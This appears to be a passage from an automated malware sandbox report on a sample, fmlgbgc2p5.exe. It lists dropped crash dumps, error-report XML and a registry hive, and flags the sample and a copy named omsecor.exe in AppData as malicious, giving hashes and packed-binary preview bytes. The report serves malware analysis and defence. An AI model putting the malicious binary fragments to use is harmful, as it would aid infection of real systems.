                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.46871130383936
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZkJg77aI9ZuWpW8VYtYm8M4JqaqF18x+q85gXT7Vld:uIjfUI7PP7VtJfaaqKT7Vld
                        MD5:4EE572B4D721952EEC18CA97D69C229D
                        SHA1:DFC8EE3E3709F321CA731F1FBE0DB08735848400
                        SHA-256:72626D641F8FAFC94D21201665F450EF2CAB04C9144D9E8ECDB88D90EE98BE33
                        SHA-512:F859F0502DD7800E485E2C9F6DD4F3A6D82F2009679CC9FC16DA7DF54186DEEA2E0A45B4829D35D6E016642636B7B4046356542B8DBE9CC43A394F5758B4BC86
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618252" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:09:16 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34068
                        Entropy (8bit):2.0064273589642734
                        Encrypted:false
                        SSDEEP:96:5V8+pYpFvE+y+oihw4TeL00GSI1jt2i73C3VIFgP/xjOiiTS2exsfqIMSrdR6wry:8+yIjg//2OGPpS/S2pxdR50yLNfRU
                        MD5:CAE2AD10B221E4FCDD4BACA0E9CB0D86
                        SHA1:3C84466CEFB5EC7115B8A0CB032B11026CED1E5E
                        SHA-256:33D121E8BA747D215562B0216594C39AD2537ABFE4C597CE67599075671E3C45
                        SHA-512:DCC65CC8170E797AD48F108F0AE7248376FBB5DA9FA6132E457A687CB2E0C2B3A2D5DEF94C246A0C6286CA15F9CC4C8CDEB54550A51F2C3FA22ADCD6A0E20C69
                        Malicious:false
                        Preview:MDMP..a..... .......<.Qg........................X...............Z...........T.......8...........T...............$y......................................................................................................eJ......x.......GenuineIntel............T.......p...;.Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8312
                        Entropy (8bit):3.698631883261777
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJNMh6NN6YNvSUBRgmfX4u6pr189bJxsf0AFDm:R6lXJ6h6n6YlSUBRgmfX4utJqfQ
                        MD5:6223873DE036A592F4A739334EA21F7F
                        SHA1:A00CD06C2F54A32067E684D13CFFA0917D21DED1
                        SHA-256:0C864FBA11CC671F591332C93E8306E31B5EACC7973237DF593AA63B5B84BB26
                        SHA-512:F8AEE7C13077D1D7C670ED3B41F85D7D9C1B570A9D2EE9E65ECD38D03DD27A2E7D6AA94BBD0100C5115AA07D2B3B6C45325DAC7D64E59FD3628DD1F0DD89A794
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.8.0.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4663
                        Entropy (8bit):4.473035251656683
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZ1Jg77aI9ZuWpW8VYFYm8M4JoaqFMP+q86g1GTFHWd:uIjftI7PP7VBJJ7PrOGTFHWd
                        MD5:095057EFDE8D4F6FB72250D550230127
                        SHA1:A9D9161DCE9695D9D731E1CC714BDEE59CD03B3F
                        SHA-256:B69F136BC21DF1CD188B04E8071D099F936806462451D995B021D8FBE051EFD2
                        SHA-512:46D5DCCED3C19BCB37E0CD76B5BD7AE72C12607BFE0FCF6355FFFFA84390BAB206D66D76DC448BA1772C9CB988F4ED95A8E70F3416124F67BCFA7EDE1551D31B
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618251" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:09:17 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34062
                        Entropy (8bit):2.0140100065722737
                        Encrypted:false
                        SSDEEP:96:5E8XaOwyCyQgKcF9R0xyVBUi73O3xE3PgWdt+GdrMRjReCp00zgLEQrgWIkWItIW:tFRK9MUOn4Wf+G1MbeCoLvU1AxeeyiV
                        MD5:00D618251435742CD191915D966BFFCC
                        SHA1:C2D252DCC93FFEEC519D57597DB855820A7207D8
                        SHA-256:8E3A6F593C0B571E25DEB789405D2BD7B50D6BC344A3DCD6096FF5966C720900
                        SHA-512:9D853A526C9136C35B73B80DAFFB405662D0703C71E547223D1C169424E1417EB028D43C2BF51930BA89A59D3AF6E0B4848E9509174465B2A9EBD9A49131018A
                        Malicious:false
                        Preview:MDMP..a..... .......=.Qg........................X...............T...........T.......8...........T................y......................................................................................................eJ......x.......GenuineIntel............T...........<.Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8240
                        Entropy (8bit):3.693030622239775
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJRN6P6YTD6CgmfV4u6prZ89bOqsfZ4am:R6lXJ76P6Y36CgmfV4u5OJfZk
                        MD5:2D05211D3AC21540DE98F6B47A0053E6
                        SHA1:C9FEF9558EF538A9939B01E83055E761112380BC
                        SHA-256:090C872755DEAC4646BBAFF5877E99E431437C04F96BD5184C7925123199C11F
                        SHA-512:9935CC73716F105A704ACE4D6A43BAC1737493B53DA39D2F15AC012B0DE906D34EA64FEB2E8DE18CCDD96290693F9BCB86A94BD09007049C10A6260014C33F10
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.6.0.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.466000007255134
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZ1Jg77aI9ZuWpW8VYvYm8M4J9aqFBU+q8QgqAT7vKd:uIjftI7PP7VfJ0+U3+T7vKd
                        MD5:4BE4CD31848E9FF2C41FD41E84DF6B44
                        SHA1:189CB891C1AF3A10FE8638783F4E86763AE84FF1
                        SHA-256:019EA4FBBCB6C5816CF7536AB596D165805C9FC785630872411B81915335F3F4
                        SHA-512:14B626BB53830BE6AA9AF70BA309741046CC91DBC49A7C861079B33C514AA91456CA6B16D84EF46515794F792736457AE33985731A103F0CB1A15FAFA6BB1356
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618251" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:58 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):33646
                        Entropy (8bit):2.0093032600406406
                        Encrypted:false
                        SSDEEP:96:5b8jQWEMJSU+TTMHCUdEmKgUi7DW3NID3llPRS6eL1woq7sxIw9EESy9lnLEwrom:CFbOCC0UO31xRSJxdqcSanLvhcflQmE
                        MD5:60A914B23999FEC63F46F66260BF8775
                        SHA1:9A05D360661DFCCB351B2E42C20CB45181C33459
                        SHA-256:2BB0A9E4BC344731FCF21A95BA9419AF3F3D8BEE36F5D06D5F861C9D6ABA5C98
                        SHA-512:9CA85794926BC5C36E051BD2CC004017ED2F3F93A26627F47DA447FBA8129123A4EE0D1B328C1146DACCCD9710D719AE05414ED739FA4E864791C5CBA96F6D4E
                        Malicious:false
                        Preview:MDMP..a..... .........Qg....................................................T.......8...........T................x......................t...............................................................................eJ..............GenuineIntel............T.............Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6280
                        Entropy (8bit):3.7176047442631237
                        Encrypted:false
                        SSDEEP:96:RSIU6o7wVetbk86sYy4x0QE/vv+5aM4Ut89bPiGsfHPF9Qm:R6l7wVeJk86sYy4u6prt89baGsfHPFem
                        MD5:D23C9AFC661494229A12E14AF0600BE7
                        SHA1:BC5728D4E28A9D3E48AEA4390CFD3B96AA9FBEF0
                        SHA-256:A0FD37CB915E6FE1F01420AD54660D9FFDCC7B1E2614B1B4E3C7B48366E3C1FC
                        SHA-512:7B2F36CABDDD045A44654A937D4692449214AD04DAD5597AE2C2C6FDFE7ACA037CABBF18A9AD5EA136BBB1B892F181591F8F34859C6965D81920879CF0DDD19D
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.0.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.467607127820123
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZTJg77aI9ZuWpW8VYJYm8M4JqaqFbRR+q8dgZr3Ty2Q7d:uIjfPI7PP7VNJfuRqgr3TXQ7d
                        MD5:3557525D78415BDA9D074046651F5F19
                        SHA1:822C4FA673F3BB18043EFCA3E44A1D9E06352DC7
                        SHA-256:3FB2D411673B1909DFF07897274578507FCF850F027808D8A7A807B8552BC13C
                        SHA-512:2DD7B92822307920F410CABE06B294EBF13CD6BB5FCDD4ABE6C5DB12EE1143975E43AC548510E9C25215C69AF1CCB12B50D7D170F559BC38DD7EC1A73298674E
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618253" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:59 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):33646
                        Entropy (8bit):2.003934772264745
                        Encrypted:false
                        SSDEEP:192:blCCm1UOWJisCdLlLKSit93qGJ2WnSxk6:lG2CplLKN93B2WSH
                        MD5:1662551753AA4FBF8CCA921AA99DDEC6
                        SHA1:7A0BD1C0E10A08EF35E335272B3BAD6607FC8242
                        SHA-256:6FB367FCA5320A1F4306511FC6F218A0B41A395AE45C6462F31CCF470CF7A704
                        SHA-512:D2540307D9E181F3B5F2C9D49830AB512DDDC0F5E06F776227E7F90E419741A138648F5A6DD0CAD12AA8E4A80AC5CA0CAB261F85A17531BF6FDCEC71D9565997
                        Malicious:false
                        Preview:MDMP..a..... .........Qg....................................................T.......8...........T................x......................t...............................................................................eJ..............GenuineIntel............T.............Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8240
                        Entropy (8bit):3.6915008095433524
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJpj1666Yve6YgmfV4u6prl89bj1sf2hm:R6lXJ91666YW6YgmfV4u9jOfh
                        MD5:F657AC0EB7FCE737FF2431ED50B92C50
                        SHA1:5CA300860D611CE36AAF05C1DF7312C1972D1224
                        SHA-256:9D5BB72DE7236A5ED285EB31F170E81FE2245065B25406E138215406893E541E
                        SHA-512:22082C54608E159AA663C3B191C27703BFC909366ED3D0AB2010D28D735E5F9EDA3923748B18DFDBCE8776299C756814ED48C6F3AB3C8724899979FB41841027
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.1.2.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.468279794774689
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZTJg77aI9ZuWpW8VYQYm8M4JVaqFf+q8Yg2T7KDwMjd:uIjfPI7PP7VoJcAP7T7KLjd
                        MD5:D5476DFA2D2E4D3F53CF80DFAED2F2B5
                        SHA1:D0A0FD4C9F53AE84D96AF1B296CA1E57B343F7CD
                        SHA-256:0821F79771B64C3FC57B531CD7F1730B30FCB3DE4D0836502955DB355069586F
                        SHA-512:6564C03A3F11E3784D579EDFCBE4C417E541FC26531CB3D23DF84245255C4A5F582C4BB692258DFAE7EEB712D9415C048E759902DCCCB6219DC1788F4FCC4DFC
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618253" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Users\user\Desktop\fmlgbgc2p5.exe
                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                        Category:dropped
                        Size (bytes):98330
                        Entropy (8bit):7.9596512885560085
                        Encrypted:false
                        SSDEEP:1536:snAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxq:sGs8cd8eXlYairZYqMddH13q
                        MD5:50E482AEFE2A49BBCB4AAEE1B8C70305
                        SHA1:10BCE9FBE4CF53152A0CC551A077C50D3F2500BE
                        SHA-256:8348D70C59B9EBE0DC19E35CDB4176E5825BD691BD1DC1EA6A0FE8EAAB0A5384
                        SHA-512:E1F609BBD66C06830A47F075E8D17EECDB0D6E816CB451E7F88EB00982D8E7B6955FA52EB6BFC7DD11A57EC798646EF9A8B17EA350FDD91CC791FCA5FFFA1E4B
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L.../s.P.................p........................@..........................0................... ................................... ..............................................................................<................................MPRESS1.........h.......................MPRESS2.............j...................rsrc........ .......x..............@..............................................................................v2.19 ..g.....E..`.Y.....A.f.7bw. <..k,/...".gD(.t.2...0.!A..J.W.6.W.%h1(............j..U...S.....A..y..& a..h!b.....+h.pV..h..9......X<.K1...^[.D.&...l..p/..\ .{...L..}....).;3l.:33.v..5.sH.....[r&.I......l...[..>.m....<......x...1.q..}.&...R~.rz1..5k.....A...jc..a.6.......r@...n7D/k...(3..?J.a.JK...f....Q.....Lk..z.V...J....Z6...D.o........O....v{...8e....'....W?6}.......8.....CX....9.H..o.h6.y...Z..z!..E#.(..5.....l.h.Y....j t...t._=..&...@y..`.7..^].#no<:4.!
                        Process:C:\Users\user\AppData\Roaming\omsecor.exe
                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                        Category:dropped
                        Size (bytes):98330
                        Entropy (8bit):7.959652331914838
                        Encrypted:false
                        SSDEEP:1536:rnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxq:rGs8cd8eXlYairZYqMddH13q
                        MD5:75B0F2A9AD432A0DBC138A050D744956
                        SHA1:22D02018102A34D608F7A7B567B0B059DD03931E
                        SHA-256:805C565C436AA64C736BA52D4C1F4B8CB4CE573C76A3774B97FCD6CAC9618039
                        SHA-512:F4A02400B44ED5C5058F46AFA70905962B83CA5E02C92105313381B9ADF6B091F7E612FB15ABA0994DF41F38BCFE5CD6138F34C7C8FF17AF35EC292C48215701
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....t.P.................p........................@..........................0................... ................................... ..............................................................................<................................MPRESS1.........h.......................MPRESS2.............j...................rsrc........ .......x..............@..............................................................................v2.19 ..g.....E..`.Y.....A.f.7bw. <..k,/...".gD(.t.2...0.!A..J.W.6.W.%h1(............j..U...S.....A..y..& a..h!b.....+h.pV..h..9......X<.K1...^[.D.&...l..p/..\ .{...L..}....).;3l.:33.v..5.sH.....[r&.I......l...[..>.m....<......x...1.q..}.&...R~.rz1..5k.....A...jc..a.6.......r@...n7D/k...(3..?J.a.JK...f....Q.....Lk..z.V...J....Z6...D.o........O....v{...8e....'....W?6}.......8.....CX....9.H..o.h6.y...Z..z!..E#.(..5.....l.h.Y....j t...t._=..&...@y..`.7..^].#no<:4.!
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):1835008
                        Entropy (8bit):4.4229033757993115
                        Encrypted:false
                        SSDEEP:6144:4cifpi6ceLPL9skLmb0mSSWSPtaJG8nAgex285i2MMhA20X4WABlGuNe5+Koo:ti58SSWIZBk2MM6AFBsoKoo
                        MD5:FC2977C1E361D75035216477A5A62FCA
                        SHA1:21604D0A222BF32162CF9513ED64421F1F298532
                        SHA-256:A68D6763B8BC4E7F2F9BCB6ECF5CD8086780109FB64ABBC956318397C823FD5A
                        SHA-512:BB9723833F677C248499D120E0CE90E830913A6C41887695AD75267A6B693E79521EDEB02947A294FDA9D7241F9DAD569BC6320EBC658051675B2CEE12FA3156
                        Malicious:false
                        Preview:regfG...G....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Tj8G..............................................................................................................................................................................................................................................................................................................................................d.C^........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        File type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                        Entropy (8bit):7.9596555927736325
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:fmlgbgc2p5.exe
                        File size:98'330 bytes
                        MD5:809d8bedb2da450b588bf82e9a118fe4
                        SHA1:5cb2c9863ddc2ba5346967bf0780554c8dc120f9
